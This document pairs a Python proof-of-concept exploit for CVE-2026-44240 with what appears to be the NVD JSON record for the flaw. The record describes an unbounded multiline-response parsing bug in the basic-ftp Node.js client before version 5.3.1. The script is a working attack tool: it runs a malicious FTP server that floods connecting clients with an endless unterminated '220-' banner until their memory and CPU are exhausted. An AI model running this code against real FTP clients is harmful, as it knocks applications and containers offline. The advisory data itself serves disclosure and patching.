CVE-2026-44240

import socket # Create a malicious FTP server to exploit the vulnerability def start_malicious_ftp(): host = '0.0.0.0' port = 21 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.bind((host, port)) s.listen(1) print(f"[+] Malicious FTP server listening on {host}:{port}") conn, addr = s.accept() print(f"[+] Connection established from {addr}") try: # Send an unterminated multiline response (starts with 220- but never sends the final 220 ) # This causes basic-ftp to keep appending data to _partialResponse payload = b"220-Welcome to the malicious FTP server\n" while True: conn.send(payload) # In a real scenario, sending attacker-controlled data to consume memory except ConnectionResetError: print("[-] Client disconnected") finally: conn.close() if __name__ == "__main__": start_malicious_ftp()

{"cve": {"id": "CVE-2026-44240", "sourceIdentifier": "[email protected]", "published": "2026-05-12T21:16:16.410", "lastModified": "2026-05-12T21:16:16.410", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "basic-ftp is an FTP client for Node.js. Prior to 5.3.1, basic-ftp is vulnerable to client-side denial of service when parsing FTP control-channel multiline responses. A malicious or compromised FTP server can send an unterminated multiline response during the initial FTP banner phase, before authentication. The client keeps appending attacker-controlled data into FtpContext._partialResponse and repeatedly reparses the accumulated buffer without enforcing a maximum control response size. As a result, an application using basic-ftp can remain stuck in connect() while memory and CPU usage grow under attacker-controlled input. This can lead to process-level denial of service, container OOM kills, worker restarts, queue backlog, or service degradation in applications that automatically connect to FTP endpoints. This vulnerability is fixed in 5.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-rpmf-866q-6p89", "source": "[email protected]"}]}}